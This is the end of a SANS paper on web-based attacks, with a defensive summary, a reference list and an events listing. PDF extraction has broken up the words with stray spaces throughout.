at - Cr oss- Si t e- Scri pt i ng/ 1/
Summary
Many of t hese at t acks can be pr event ed and or detect ed
bef or e t hey do i r r epar abl e harm. Proper def enses r equi r e a
def ense i n dept h appr oach. Onl y a f ew of t he poss i bl e
appr oaches have been di scussed i n t hi s paper , and l i kel y i n t i me
t hese st r at egi es wi l l r equi r e t weaki ng and i mpr ovement as at t ack
vect or s wi l l i nvar i abl y evol ve over t i me.
I n summar y a combi nat i on of appl i cat i on of bot h
t echnol ogi es and user awar eness are the onl y ef f ect i ve ways of
t r ul y def endi ng agai nst web at t acks. Technol ogi es such as
appl i cat i on l ayer f i r ewal l s, r ever se pr oxi es, I nt r usi on
Det ect i on and Pr event i on syst ems coupl ed wi t h a sol i d secur i t y
t r ai ni ng pr ogr am f or appl i cat i on devel oper s wi l l yi el d
si gni f i cant secur i t y enhancement s. Addi t i onal l y t he use of code
r evi ew t ool s and scanner s wi l l pr ovi de pr oact i ve r esour ces t hat
bot h devel oper s and i n house secur i t y pr of essi onal s can l ever age
i n di scover i ng appl i cat i on l ayer weaknesses.
For many busi nesses whi ch conduct busi ness onl i ne, t hei r
r eput at i on i s at st ake. One br each can of t ent i mes l ead t o
i r r eparabl e br and damage. And put t i ng a pr i ce on t he amount of
damage done i s of t ent i mes ext r emel y di f f i cul t , t hough l osses t o
publ i c compani es can be i n excess of bi l l i ons when st ock
val uat i ons ar e consi der ed.
ht t p: / / esj . com/ Case_St udy/ ar t i cl e. aspx?Edi t or i al sI D=2249
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 44/47
Web Based At t acks
J ust i n Cr i st 43
REFERENCES
Desmond, Paul ( 2004, May 17) . Al l - out bl i t z agai nst Web app At t acks
Ret r i eved December 30, 2006, f r om net workwor l d. com
Web si t e: ( 1)
ht t p: / / www. networkwor l d. com/ t echi nsi der / 2004/ 0517t echi nsi der mai n. ht ml
Hei mann, J ohn (2006, May 23) . The I mport ance of Secur i t y Tr ai ni ng.
Ret r i eved Oct ober 31, 2006, f r om CI O Update websi t e:
ht t p: / / www. ci oupdat e. com/ ar t i cl e. php/ 3608391
I mper va, ( 2007, Febr uar y 1) SQL I nj ect i on.
Ret r i eved Februar y 10, 2007 f r om:ht t p: / / www. i mper va. com/ appl i cat i on_def ense_cent er / gl ossar y/ sql _i nj ect i o
n. ht ml
I nt er net Wor l d St at s. ( 2007, J anuar y 11) . I nt er net Wor l d St at s, Usage and Population Statistics.
Ret r i eved Febr uar y 01, 2006, f r omht t p: / / www. i nt er net wor l dst at s. com/ st at s2. ht m
Kr ebs, Br i an ( 2006, Sept ember 28) . I D Thi eves Tur n Si ght s on Smal l er E-Busi nesss. Ret r i eved December 30, 2006, f r om Washi ngt onPost . com
Web si t e: ( 1)
ht t p: / / www. washi ngt onpost . com/ wp-dyn/ cont ent / ar t i cl e/ 2006/ 09/ 28/ AR2006092800333. html
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 45/47
Web Based At t acks
J ust i n Cr i st 44
Gart ner ( 2006, May 12) . Magi c Quadr ant f or Secur i t y I nf ormat i on and EventManagement .
Ret r i eved Febr uar y 28, 2007, f r om Novel l . com
Web si t e: ( 1)
ht t p: / / www. novel l . com/ pr oduct s/ sent i nel / gar t ner . pdf
Gar t ner ( 2005, May 2) . I mprove I T Secur i t y wi t h Vul nerabi l i t y Management
Ret r i eved Febr uar y 27, 2007, f r om Gar t ner . com
Web si t e: ht t p: / / www. gar t ner . com/ Di spl ayDocument ?doc_cd=127481
Hal l oway, J ason (No Date Pr ovi ded) . Ri sk and Secur i t y Rewards.
Ret r i eved Febr uar y 27, 2007, f r om CSOONLI NE. COM
Web si t e: ( 1)
ht t p: / / www. csoonl i ne. com/ caveat / 012907. ht ml
Lee, Mi e- Yun (2001, J ul y 1) . Money i n the eBank – t r ai ni ng cust omer s t o t r ustonl i ne banks
Ret r i eved Febr uar y 10, 2007, f r omht t p: / / f i ndar t i cl es. com/ p/ ar t i cl es/ mi _m0DTI / i s_7_29/ ai _79826907
OWASP, ( 2007, Febr uar y 10) Wel come t o OWASP.
Ret r i eved Februar y 10, 2007 f r om:
ht t p: / / www. owasp. org/ i ndex. php/ Mai n_Page
OWASP. ( 2006, December 21) . I n Wikipedia, The Free
Encyclopedia.
Ret r i eved Febr uar y 01, 2007, f r om
ht t p: / / en. wi ki pedi a. or g/ wi ki / OWASP
PCI and Data Secur i t y Compl i ance. ( 2007, J anuar y 19) . Wordpr ess websi t e
Ret r i eved Febr uar y 15, 2006, f r omht t p: / / dat asecur i t y. wor dpr ess. com/ 2007/ 02/ 05/ owasp- t op- 10- f or - 2007/
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 46/47
Web Based At t acks
J ust i n Cr i st 45
Skoudi s, Ed (2005) . SANS TRAI NI NG TRACK 4.
Ret r i eved Oct ober 31, 2006, f r om SANS I nst i t ut e t r ai ni ng document s.Not distributed publicly.
SQLCour se. com. ( 2006, May 12) . SQLCour se. com websi t e
Ret r i eved Oct ober 31, 2006, f r om
ht t p: / / sql cour se. com/ dr op. ht ml
Symant ec News Rel ease. ( 2006, September 19) . Symant ec. com websi t e
Ret r i eved Oct ober 31, 2006, f r omht t p: / / www. symant ec. com/ about / news/ r el ease/ art i cl e. j sp?pr i d=20060919_01
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 47/47
Last Updated: August 20th, 2013
Upcoming SANS TrainingClick Here for a full list of all Upcoming SANS Events by Location
SANS Melbourne 2013 Melbourne, AU Sep 02, 2013 - Sep 07, 2013 Live Event
SANS Capital City 2013 Washington, DCUS Sep 03, 2013 - Sep 08, 2013 Live Event
SANS Network Security 2013 Las Vegas, NVUS Sep 14, 2013 - Sep 23, 2013 Live Event
SEC 440 @MCMC Sept 2013 CyberJaya, MY Sep 17, 2013 - Sep 19, 2013 Live Event
SANS Forensics Prague 2013 Prague, CZ Oct 06, 2013 - Oct 13, 2013 Live Event
SANS Seattle 2013 Seattle, WAUS Oct 07, 2013 - Oct 14, 2013 Live Event
SANS Bangalore 2013 Bangalore, IN Oct 14, 2013 - Oct 26, 2013 Live Event
SANS Baltimore 2013 Baltimore, MDUS Oct 14, 2013 - Oct 19, 2013 Live Event
SEC760 Advanced Exploit Development for Penetration Testers Baltimore, MDUS Oct 14, 2013 - Oct 19, 2013 Live Event
GridSecCon 2013 Jacksonville, FLUS Oct 15, 2013 - Oct 17, 2013 Live Event
Healthcare Cyber Security Summit San Francisco, CAUS Oct 17, 2013 - Oct 24, 2013 Live Event
Securing the Internet of Things Summit San Francisco, CAUS Oct 17, 2013 - Oct 22, 2013 Live Event
SANS Tokyo Autumn 2013 Tokyo, JP Oct 21, 2013 - Oct 26, 2013 Live Event
October Singapore 2013 Singapore, SG Oct 21, 2013 - Nov 02, 2013 Live Event
SANS Dubai 2013 Dubai, AE Oct 26, 2013 - Nov 07, 2013 Live Event
FOR572 Advanced Network Forensics and Analysis Washington, DCUS Oct 28, 2013 - Nov 02, 2013 Live Event
SANS Chicago 2013 Chicago, ILUS Oct 28, 2013 - Nov 02, 2013 Live Event
MGT415 at (ISC)2 SecureSoCal 2013 Manhattan Beach, CAUS Oct 31, 2013 - Oct 31, 2013 Live Event
SANS South Florida 2013 Fort Lauderdale, FLUS Nov 04, 2013 - Nov 09, 2013 Live Event
MGT415 at (ISC)2 SecureDallas 2013 Dallas, TXUS Nov 06, 2013 - Nov 06, 2013 Live Event
SANS Pen Test Hackfest Training Event and Summit Washington, DCUS Nov 07, 2013 - Nov 14, 2013 Live Event
SANS Sydney 2013 Sydney, AU Nov 11, 2013 - Nov 23, 2013 Live Event
SANS Korea 2013 Seoul, KR Nov 11, 2013 - Nov 23, 2013 Live Event
Cloud Security @ CLOUD Expo Asia Singapore, SG Nov 13, 2013 - Nov 15, 2013 Live Event
SANS London 2013 London, GB Nov 16, 2013 - Nov 25, 2013 Live Event
SANS San Diego 2013 San Diego, CAUS Nov 18, 2013 - Nov 23, 2013 Live Event
FOR585 Adv Mobile Device Forensics Vienna, VAUS Nov 18, 2013 - Nov 23, 2013 Live Event
SANS Thailand 2013 OnlineTH Aug 26, 2013 - Aug 31, 2013 Live Event
SANS OnDemand Books & MP3s OnlyUS Anytime Self Paced